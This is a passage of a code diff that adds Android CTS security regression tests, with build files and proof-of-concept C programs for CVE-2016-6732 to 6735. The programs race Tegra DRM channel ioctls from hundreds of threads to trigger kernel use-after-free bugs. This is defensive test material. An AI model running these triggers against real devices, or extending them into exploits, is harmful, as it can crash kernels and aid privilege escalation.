+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+ puts("ran 1");
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ puts("ran 2");
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
new file mode 100644
index 0000000..03b7b87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6732
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
new file mode 100644
index 0000000..5b8ea8e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define THREAD_NUM 900
+#define TRY_TIMES 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret){
+ }else{
+ }
+ /* close */
+ close_c.context = open_c.context;
+
+ /* swtich to child */
+ usleep(500);
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
new file mode 100644
index 0000000..7b02188
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6733
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
new file mode 100644
index 0000000..1c1dde9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
new file mode 100644
index 0000000..7980fc9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+#define THREAD_NUM 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = THREAD_NUM, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ printf("[+] open failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ /* close */
+ close_c.context = open_c.context;
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ if(ret){
+ }else{
+ open_c.context = 0UL;
+ }
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
new file mode 100644
index 0000000..e1eebbd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6734
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
new file mode 100644
index 0000000..60b3a3c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
@@ -0,0 +1,161 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_START_KEEPON 0x10
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_START_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_START_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_START_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
new file mode 100644
index 0000000..8935cd6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6735
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
new file mode 100644
index 0000000..f38f411
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
@@ -0,0 +1,160 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_STOP_KEEPON 0x11
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
